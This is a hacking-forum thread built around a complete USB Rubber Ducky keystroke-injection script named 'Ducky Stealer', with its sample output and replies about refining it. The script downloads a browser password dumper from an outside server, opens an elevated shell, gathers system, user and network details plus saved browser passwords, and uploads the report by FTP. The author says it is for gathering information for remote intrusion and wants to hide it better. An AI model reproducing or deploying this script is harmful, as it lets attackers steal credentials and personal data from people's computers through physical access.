EvilZone
Programming and Scripting => Scripting Languages => : iTpHo3NiX May 28, 2015, 12:50:01 PM
-
Well I finally decided fuck it and got a rubber ducky. Bored at work, hand wrote this script, will test at home and make modifications as nessesary.
REM ********************************
REM *** builddate28.5.2015 ***
REM *** DeepCopy's Ducky Stealer ***
REM *** v1.0 evilzone.org ***
REM ********************************
REM ********************************
REM *** Initial Delay ***
DELAY 2000
REM *** Download Dependancies ***
GUI r
DELAY 400
STRING cmd
DELAY 400
ENTER
GUI r
DELAY 400
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://upload.evilzone.org/?page=download&file=GePROYjEHwjSRNAZgXi9M0QPtLGj00bT3VBFy3mvvNDkwH95e8','%TEMP%\bpd.exe');
ENTER
DELAY 7000
REM *** UAC Bypass - Elevated CMD ***
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Start Stealer ***
STRING cd %TEMP%
ENTER
DELAY 400
STRING set num=%random%
ENTER
DELAY 200
STRING set report=%USERNAME%-%num%
ENTER
DELAY 200
STRING echo DeepCopy's Ducky Stealer v1.0 > %report%.txt
ENTER
DELAY 300
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING echo System Reconnaissance >> %report%.txt
ENTER
DELAY 200
STRING systeminfo >> %report%.txt
ENTER
DELAY 11000
STRING tasklist /v >> %report%.txt
ENTER
DELAY 400
STRING net start >> %report%.txt
ENTER
DELAY 500
STRING net user >> %report%.txt
ENTER
DELAY 300
STRING echo IP Information: >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING ipconfig /all >> %report%.txt
ENTER
DELAY 400
STRING nslookup myip.opendns.com resolver1.opendns.com >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 1000
STRING echo Drives and Directories: >> %report%.txt
ENTER
DELAY 1000
STRING mountvol >> %report%.txt
ENTER
STRING cd %programfiles%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %programfiles(x86)%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %TEMP%
ENTER
STRING echo. >> %report%.txt
ENTER
DELAY 100
STRING echo Website Save Passwords: >> %report%.txt
ENTER
DELAY 400
STRING bpd.exe -f webpass.txt
ENTER
DELAY 7000
STRING copy %report%.txt + webpass.txt %report%.txt
ENTER
REM *** Create FTP Profile ***
STRING echo user user>ftp.dcs
ENTER
STRING echo pass>>ftp.dcs
ENTER
STRING echo cd htdocs>>ftp.dcs
ENTER
STRING echo PUT %report%.txt>>ftp.dcs
ENTER
STRING echo quit>>ftp.dcs
ENTER
STRING ftp -n -s:ftp.dcs ftp.server
ENTER
DELAY 5000
REM *** Melt Harvested Information ***
REM STRING del /f /q *.dcs
REM ENTER
REM STRING del /f /q *.exe
REM ENTER
REM STRING del /f /q *.txt
REM ENTER
STRING exit
ENTER
REM *** Notify Script is Done ***
GUI r
DELAY 600
STRING notepad
ENTER
DELAY 1000
STRING I'm done master
DELAY 4000
ALT F4
STRING n
ENTER
Edit:
I made some changes, some things wouldn't have worked... I'm sorting out some hosting issues and then I will test it out
EDIT 5/30/15
Finally working... I will edit and clean up this thread and post what it does, but for now, read the report output (done from a live win 7 x64 system) and you'll get the hint. To use the script on your own ducky/nethunter device, simply change FTP setting for your server and you're good to go to use my script.. I will create a twin duck version possibly for offline use (download and reports will be on the USB.
Example output:
DeepCopy's Ducky Stealer v1.0
System Reconnaissance
Host Name: xxxx-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: xxxx
Registered Organization:
Product ID: xxx-OEM-xxxx-xxx
Original Install Date: 7/22/2013, 11:50:51 AM
System Boot Time: 5/30/2015, 9:12:46 PM
System Manufacturer: HP-Pavilion
System Model: VT493AA-ABA s5212y
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2500 Mhz
BIOS Version: Phoenix Technologies, LTD 5.24, 6/19/2009
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,061 MB
Available Physical Memory: 1,724 MB
Virtual Memory: Max Size: 6,121 MB
Virtual Memory: Available: 4,548 MB
Virtual Memory: In Use: 1,573 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\xxxx-PC
Hotfix(s): 347 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB971033
[08]: KB2506143
[09]: KB2479943
[10]: KB2484033
[11]: KB2488113
[12]: KB2491683
[13]: KB2503665
[14]: KB2505438
[15]: KB2506014
[16]: KB2506212
[17]: KB2506928
[18]: KB2509553
[19]: KB2511250
[20]: KB2511455
[21]: KB2515325
[22]: KB2522422
[23]: KB2529073
[24]: KB2532531
[25]: KB2533552
[26]: KB2534111
[27]: KB2536275
[28]: KB2536276
[29]: KB2541014
[30]: KB2544893
[31]: KB2545698
[32]: KB2547666
[33]: KB2552343
[34]: KB2560656
[35]: KB2563227
[36]: KB2564958
[37]: KB2570947
[38]: KB2574819
[39]: KB2579686
[40]: KB2584146
[41]: KB2585542
[42]: KB2603229
[43]: KB2604115
[44]: KB2618451
[45]: KB2619339
[46]: KB2620704
[47]: KB2620712
[48]: KB2621440
[49]: KB2631813
[50]: KB2640148
[51]: KB2644615
[52]: KB2645640
[53]: KB2647753
[54]: KB2653956
[55]: KB2654428
[56]: KB2655992
[57]: KB2656356
[58]: KB2656373
[59]: KB2656411
[60]: KB2658846
[61]: KB2659262
[62]: KB2660075
[63]: KB2660649
[64]: KB2661254
[65]: KB2667402
[66]: KB2676562
[67]: KB2679255
[68]: KB2685811
[69]: KB2685813
[70]: KB2685939
[71]: KB2686831
[72]: KB2688338
[73]: KB2690533
[74]: KB2691442
[75]: KB2698365
[76]: KB2699779
[77]: KB2705219
[78]: KB2709630
[79]: KB2709981
[80]: KB2712808
[81]: KB2718704
[82]: KB2719857
[83]: KB2719985
[84]: KB2724197
[85]: KB2726535
[86]: KB2727528
[87]: KB2729094
[88]: KB2729452
[89]: KB2732059
[90]: KB2732487
[91]: KB2732500
[92]: KB2735855
[93]: KB2736233
[94]: KB2736422
[95]: KB2739159
[96]: KB2741355
[97]: KB2742599
[98]: KB2743555
[99]: KB2749655
[100]: KB2750841
[101]: KB2753842
[102]: KB2756921
[103]: KB2757638
[104]: KB2758857
[105]: KB2761217
[106]: KB2762895
[107]: KB2763523
[108]: KB2770660
[109]: KB2773072
[110]: KB2779030
[111]: KB2779562
[112]: KB2785220
[113]: KB2786081
[114]: KB2786400
[115]: KB2789645
[116]: KB2790113
[117]: KB2791765
[118]: KB2798162
[119]: KB2799926
[120]: KB2800095
[121]: KB2803821
[122]: KB2804579
[123]: KB2807986
[124]: KB2808679
[125]: KB2809215
[126]: KB2809900
[127]: KB2813170
[128]: KB2813347
[129]: KB2813430
[130]: KB2813956
[131]: KB2820197
[132]: KB2820331
[133]: KB2823180
[134]: KB2830290
[135]: KB2832414
[136]: KB2833946
[137]: KB2834140
[138]: KB2834886
[139]: KB2835361
[140]: KB2835364
[141]: KB2836502
[142]: KB2836943
[143]: KB2839894
[144]: KB2840149
[145]: KB2840631
[146]: KB2843630
[147]: KB2844286
[148]: KB2845187
[149]: KB2845690
[150]: KB2846960
[151]: KB2847077
[152]: KB2847311
[153]: KB2847927
[154]: KB2849470
[155]: KB2850851
[156]: KB2852386
[157]: KB2853952
[158]: KB2857650
[159]: KB2861191
[160]: KB2861698
[161]: KB2861855
[162]: KB2862152
[163]: KB2862330
[164]: KB2862335
[165]: KB2862966
[166]: KB2862973
[167]: KB2863058
[168]: KB2863240
[169]: KB2864058
[170]: KB2864202
[171]: KB2868038
[172]: KB2868116
[173]: KB2868623
[174]: KB2868626
[175]: KB2868725
[176]: KB2871997
[177]: KB2872339
[178]: KB2875783
[179]: KB2876284
[180]: KB2876315
[181]: KB2876331
[182]: KB2882822
[183]: KB2883150
[184]: KB2884256
[185]: KB2887069
[186]: KB2888049
[187]: KB2891804
[188]: KB2892074
[189]: KB2893294
[190]: KB2893519
[191]: KB2893984
[192]: KB2894844
[193]: KB2898785
[194]: KB2898857
[195]: KB2900986
[196]: KB2901112
[197]: KB2904266
[198]: KB2908783
[199]: KB2909210
[200]: KB2909921
[201]: KB2911501
[202]: KB2912390
[203]: KB2913152
[204]: KB2913431
[205]: KB2913602
[206]: KB2916036
[207]: KB2918077
[208]: KB2918614
[209]: KB2919469
[210]: KB2922229
[211]: KB2923545
[212]: KB2925418
[213]: KB2926765
[214]: KB2928562
[215]: KB2929437
[216]: KB2929733
[217]: KB2929755
[218]: KB2929961
[219]: KB2930275
[220]: KB2931356
[221]: KB2936068
[222]: KB2937610
[223]: KB2939576
[224]: KB2943357
[225]: KB2949927
[226]: KB2952664
[227]: KB2953522
[228]: KB2957189
[229]: KB2957503
[230]: KB2957509
[231]: KB2957689
[232]: KB2961072
[233]: KB2962872
[234]: KB2964358
[235]: KB2964444
[236]: KB2965788
[237]: KB2966583
[238]: KB2968294
[239]: KB2970228
[240]: KB2971850
[241]: KB2972100
[242]: KB2972211
[243]: KB2972280
[244]: KB2973112
[245]: KB2973201
[246]
Network Card(s): 1 NIC(s) Installed.
[01]: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: xx.xxx.xx.xx
IP address(es)
[01]: xx.xxx.xx.xxx
[02]: xxxx::xxxx:xxxx:xxxx:xxxx
[03]: xxxx:xxx:xxxx:xx:xxxx:xxxx:xxxx:xxxx
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 24 K Unknown NT AUTHORITY\SYSTEM 0:56:14 N/A
System 4 Services 0 6,740 K Unknown N/A 0:00:22 N/A
smss.exe 832 Services 0 1,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 992 Services 0 4,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wininit.exe 364 Services 0 4,380 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 384 Console 1 9,100 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
winlogon.exe 436 Console 1 7,196 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 480 Services 0 9,888 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
lsass.exe 496 Services 0 12,488 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
lsm.exe 508 Services 0 4,124 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 804 Services 0 9,344 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 996 Services 0 8,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1044 Services 0 23,732 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1108 Services 0 126,036 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
svchost.exe 1152 Services 0 21,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1184 Services 0 39,900 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 1300 Services 0 5,844 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1432 Services 0 15,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
spoolsv.exe 1552 Services 0 14,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1592 Services 0 14,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
armsvc.exe 1776 Services 0 3,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhost.exe 1856 Console 1 17,148 K Running xxx-PC\xxx 0:00:00 MCI command handling window
agr64svc.exe 1960 Services 0 2,696 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 1968 Console 1 28,584 K Running xxx-PC\xxx 0:00:31 DWM Notification Window
mDNSResponder.exe 2020 Services 0 5,824 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2044 Services 0 8,580 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
DymoPnpService.exe 1336 Services 0 20,228 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
explorer.exe 1688 Console 1 79,496 K Running xxx-PC\xxx 0:00:24 N/A
hkcmd.exe 2180 Console 1 6,180 K Running xxx-PC\xxx 0:00:00 N/A
igfxsrvc.exe 2256 Console 1 6,048 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
igfxpers.exe 2316 Console 1 6,036 K Running xxx-PC\xxx 0:00:00 PersistWndName
svchost.exe 2552 Services 0 11,588 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
PSANHost.exe 2668 Services 0 20,760 K Unknown NT AUTHORITY\SYSTEM 0:00:33 N/A
AgentSvc.exe 2796 Services 0 15,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAMain.exe 2868 Console 1 564 K Running xxx-PC\xxx 0:00:01 TryBarAPPAV
PhoneMyPC_Helper.exe 3056 Services 0 15,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAService.exe 2352 Services 0 404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PhoneMyPC.exe 2476 Console 1 19,504 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2160 Services 0 12,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OSPPSVC.EXE 3828 Services 0 11,876 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
SearchIndexer.exe 3912 Services 0 24,840 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
WUDFHost.exe 3968 Services 0 6,164 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wmpnetwk.exe 3636 Services 0 10,216 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 3092 Services 0 5,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
IntuitUpdateService.exe 1796 Services 0 3,720 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 4512 Services 0 26,572 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 1584 Services 0 11,772 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
chrome.exe 4580 Console 1 97,716 K Running xxx-PC\xxx 0:00:26 [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP) - Google Chrome
chrome.exe 4084 Console 1 109,348 K Unknown xxx-PC\xxx 0:00:05 N/A
chrome.exe 3472 Console 1 31,172 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3140 Console 1 9,256 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3268 Console 1 62,012 K Unknown xxx-PC\xxx 0:00:16 N/A
chrome.exe 4928 Console 1 62,448 K Unknown xxx-PC\xxx 0:00:05 N/A
audiodg.exe 1600 Services 0 17,528 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
WmiPrvSE.exe 4396 Services 0 6,732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 4492 Console 1 2,908 K Running xxx-PC\xxx 0:00:00 Administrator: C:\Windows\system32\cmd.exe - tasklist /v
conhost.exe 2152 Console 1 5,888 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
WmiPrvSE.exe 2680 Services 0 12,128 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 4836 Services 0 5,824 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
TrustedInstaller.exe 3108 Services 0 14,028 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
tasklist.exe 1212 Console 1 5,980 K Unknown xxx-PC\xxxxx 0:00:00 N/A
These Windows services are started:
Adobe Acrobat Update Service
Agere Modem Call Progress Audio
Application Experience
Application Information
Base Filtering Engine
Bonjour Service
CNG Key Isolation
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Diagnostic System Host
Diagnostics Tracking Service
Distributed Link Tracking Client
DNS Client
DYMO PnP Service
Encrypting File System (EFS)
Function Discovery Provider Host
Function Discovery Resource Publication
Group Policy Client
HomeGroup Listener
HomeGroup Provider
Human Interface Device Access
IKE and AuthIP IPsec Keying Modules
Intuit Update Service v4
IP Helper
IPsec Policy Agent
Multimedia Class Scheduler
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Office Software Protection Platform
Offline Files
Panda Devices Agent
Panda Product Service
Panda Protection Service
Peer Name Resolution Protocol
Peer Networking Grouping
Peer Networking Identity Manager
Plug and Play
PnP-X IP Bus Enumerator
Portable Device Enumerator Service
Power
Print Spooler
Program Compatibility Assistant Service
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
SSDP Discovery
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
WebClient
Windows Audio
Windows Audio Endpoint Builder
Windows Connect Now - Config Registrar
Windows Defender
Windows Driver Foundation - User-mode Driver Framework
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Media Player Network Sharing Service
Windows Modules Installer
Windows Search
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
The command completed successfully.
User accounts for \\xxxx-PC
-------------------------------------------------------------------------------
Administrator Guest xxxx
The command completed successfully.
IP Information:
Windows IP Configuration
Host Name . . . . . . . . . . . . : xxxx-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xxxx.xx.xxxxxxx.net
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Physical Address. . . . . . . . . : xx-xx-xx-xx-xx-xx
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:558:6045:5e:147b:10a5:b298:a98e(Preferred)
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:36:50 PM
Lease Expires . . . . . . . . . . : Wednesday, June 03, 2015 9:36:50 PM
Link-local IPv6 Address . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx(Preferred)
IPv4 Address. . . . . . . . . . . : x.xxx.xx.xxx(Preferred)
Subnet Mask . . . . . . . . . . . : xxx.xxx.xxx.x
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:30:00 PM
Lease Expires . . . . . . . . . . : Saturday, May 30, 2015 10:30:00 PM
Default Gateway . . . . . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx
xx.xx.xx.xx
DHCP Server . . . . . . . . . . . : xx.xx.xx.xx
DHCPv6 IAID . . . . . . . . . . . : xxxx
DHCPv6 Client DUID. . . . . . . . : xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx
DNS Servers . . . . . . . . . . . : 2001:558:feed::1
2001:558:feed::2
xx.xx.xx.xx
xx.xx.xx.xx
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
xxxx.xx.xxxxxxx.net
Tunnel adapter isatap.hsd1.ca.comcast.net.:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: resolver1.opendns.com
Address: 208.67.222.222
Name: myip.opendns.com
Address: xxx.xxx.xxx.xxx
Drives and Directories:
Creates, deletes, or lists a volume mount point.
MOUNTVOL [drive:]path VolumeName
MOUNTVOL [drive:]path /D
MOUNTVOL [drive:]path /L
MOUNTVOL [drive:]path /P
MOUNTVOL /R
MOUNTVOL /N
MOUNTVOL /E
path Specifies the existing NTFS directory where the mount
point will reside.
VolumeName Specifies the volume name that is the target of the mount
point.
/D Removes the volume mount point from the specified directory.
/L Lists the mounted volume name for the specified directory.
/P Removes the volume mount point from the specified directory,
dismounts the volume, and makes the volume not mountable.
You can make the volume mountable again by creating a volume
mount point.
/R Removes volume mount point directories and registry settings
for volumes that are no longer in the system.
/N Disables automatic mounting of new volumes.
/E Re-enables automatic mounting of new volumes.
Possible values for VolumeName along with current mount points are:
\\?\Volume{899bc397-f2f5-11e2-b4be-806e6f6e6963}\
*** NO MOUNT POINTS ***
\\?\Volume{899bc398-f2f5-11e2-b4be-806e6f6e6963}\
C:\
\\?\Volume{899bc3a4-f2f5-11e2-b4be-806e6f6e6963}\
F:\
\\?\Volume{899bc3a8-f2f5-11e2-b4be-806e6f6e6963}\
G:\
\\?\Volume{899bc39b-f2f5-11e2-b4be-806e6f6e6963}\
D:\
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
02/06/2015 04:12 PM <DIR> Android
06/22/2014 11:24 AM <DIR> Apache Software Foundation
09/03/2014 08:44 PM <DIR> Bonjour
08/21/2013 01:11 PM <DIR> CCleaner
01/24/2014 10:45 AM <DIR> Common Files
02/12/2014 04:29 PM <DIR> DIFX
04/12/2011 01:28 AM <DIR> DVD Maker
07/22/2013 02:38 PM <DIR> HP
05/13/2015 05:38 PM <DIR> Internet Explorer
02/06/2015 04:09 PM <DIR> Java
07/22/2013 03:11 PM <DIR> LSI SoftModem
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
04/12/2011 01:28 AM <DIR> Microsoft Games
07/30/2013 12:00 PM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft SQL Server Compact Edition
07/30/2013 12:00 PM <DIR> Microsoft Synchronization Services
07/13/2009 10:32 PM <DIR> MSBuild
07/22/2013 02:54 PM <DIR> Realtek
07/13/2009 10:32 PM <DIR> Reference Assemblies
01/05/2014 12:05 PM <DIR> SAMSUNG
07/04/2014 02:06 PM <DIR> SoftwareForMe Inc
07/23/2013 03:28 AM <DIR> Windows Defender
05/13/2015 05:37 PM <DIR> Windows Journal
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
07/30/2013 11:47 AM <DIR> WinRAR
1 File(s) 2,010 bytes
32 Dir(s) 125,307,084,800 bytes free
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files (x86)
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
10/01/2013 12:11 AM <DIR> Adobe
01/27/2014 12:07 AM <DIR> Antenna
04/25/2015 04:03 PM <DIR> ArtCine NFO Creator 2.0
04/25/2015 07:04 PM <DIR> Audacity
09/03/2014 08:44 PM <DIR> Bonjour
07/27/2014 05:37 PM <DIR> Breaktru Software
02/06/2015 04:10 PM <DIR> Common Files
08/20/2014 07:38 PM <DIR> DYMO
06/13/2014 12:27 AM <DIR> FileZilla FTP Client
01/24/2014 10:37 AM <DIR> Free Download Manager
03/11/2015 07:45 AM <DIR> Google
07/22/2013 02:38 PM <DIR> HP
06/13/2014 01:48 AM <DIR> iCare Data Recovery
04/04/2015 01:28 PM <DIR> ImageWriter
05/13/2015 05:38 PM <DIR> Internet Explorer
02/20/2015 01:43 AM <DIR> Java
02/12/2014 04:29 PM <DIR> LeapFrog
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
07/30/2013 11:58 AM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft.NET
06/13/2014 01:51 AM <DIR> MiniTool Partition Wizard Professional Edition 8.1
05/02/2015 09:03 PM <DIR> Mozilla Firefox
05/28/2015 04:21 PM <DIR> Mozilla Maintenance Service
07/13/2009 10:32 PM <DIR> MSBuild
01/24/2014 10:42 AM <DIR> MSXML 4.0
03/11/2015 07:45 AM <DIR> NCH Software
01/28/2014 11:51 PM <DIR> Nuance
06/12/2014 01:44 AM <DIR> Panda Security
07/13/2009 10:32 PM <DIR> Reference Assemblies
02/06/2015 02:55 PM <DIR> TurboTax
12/19/2014 06:13 PM <DIR> TypingMaster
07/23/2013 03:28 AM <DIR> Windows Defender
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
1 File(s) 2,584 bytes
42 Dir(s) 125,307,080,704 bytes free
Website Save Passwords:
**********************************************
Browser Password Recovery Report
**********************************************
Browser: Google Chrome
Website: https://mfasa.chase.com/auth/login.html
Username: lololol
Password: olololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://segment.com/login
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: lololol
Username: lololol
Password: lololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://www.registry.cu.cc/checklogin.php
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://my.bluehost.com/web-hosting/cplogin
Username: lololololol
Password: lololololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://panel.byethost.com/login.php
Username: lololol
Password: lolol
---------------------------------------------------------------------------
_______________________________________________________________________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com
�
-
Cool, so Ducky uses its own dialect, not arduino. Can it programmed with something else? For general purpose I'd go with a more expensive teensy, but the basic v2 was ok when I was doing this, might give you some ideas: https://evilzone.org/c-c/%28arduino%29-payload-launcher-for-teensy/
Sadly my teensy got fried when I was fucking with the firmware... I was gonna order another one lel, because ducky is WAY too expensive to get it into my country.
-
I'm thinking of getting a ducky myself. Let us know how the test goes. Didn't read your script in it's entirety, but have a pretty good idea what it does without knowing ducky's preferences.
-
Still needs some work, defiantly need more delays between commands. Then got to fix the report file not uploading, but it has more to do with the free server that I'm using vs the script not working. However the download from ftp isn't working well so I'm going to do an alternate download method. Nix would be so much easier with wget -_- i can use powershell or a vbs script to do it. When I get the time I'll update it. But for now still a WIP
-
Cool script idea, thank's for sharing it. Ducky is definetly great device, i've had one for a while now but haven't use it lately. This got me starting to play with it once again.:D
About that alternative download method. (If i got your script right that you are sending that harvested info to ftp server.) With "twin duck" firmware you could also save that stuff in ducky's sdcard. You most likely knew this already but i put link anyways if someone is intrested.
https://forums.hak5.org/index.php?/topic/28162-firmware-introducing-twin-duck/
Also just for the info if here is some nexus device owners who doesn't know that with nethunter you can run ducky scripts from your phone and tablets. Kind of cool idea if you ask me... "Hey, can i plug my phone quickly to your laptop to charge it"..
-
Um, nexus 5 owner here, this is totally new information to me lol. Thanks for sharing m8 +1
-
Well i updated my script. Im about to test it now, the file download is causing me the most issues. Cant get the FTP to download correctly as well as powershell... simply can't figure that one out, so VBS is my other option. I'll update this post if this works ;)
-
Honestly, I think going the vbs route would be better all around. More flexibility and could have it put it in the startup folder. Or just write your own code and compile it and just have the ducky copy it over and run it. The ducky script would still be useful to cd into a temp dir and go from there. Have your own code do the heavy lifting.
-
Script is 100% working on my test system. ended up using a properly formatted powershell command for the download. Was fun, now I hope nobody lets me plug a USB into their computer. Now I will probably tweak delays and hide it more so we can do things unnoticed ;)
-
Hmm... well it seems that they have a European warehouse now, so the ducky costs 40euro. Really expensive for a little thing like that... is it really worth it?
-
I paid $40 (USD) and is it really worth it? Probably not. But it is fun to play with. I guess for a black hat it can really be worth it. But also for scripting mundane tasks it could be useful. I like it for harvesting information which is why I wrote this script. Now whenever I'm around a windows computer I can just plug this in and have information necessary for remote intrusion. You could also set it up for backdoor access, however not really what I'm interested in these days. Simply collecting information and the PoC is very interesting. HID that looks like a USB is definitely something fun.
-
I might just buy one to have a ready-made dongle, since my Teensy project went to shit lol. However I have plans on making a hardware keylogger with it, in the future...
So this ducky has an SDCard slot, does it mean SD card can be used to access and write data? why don't you just use that instead of trying to download stuff from the web?
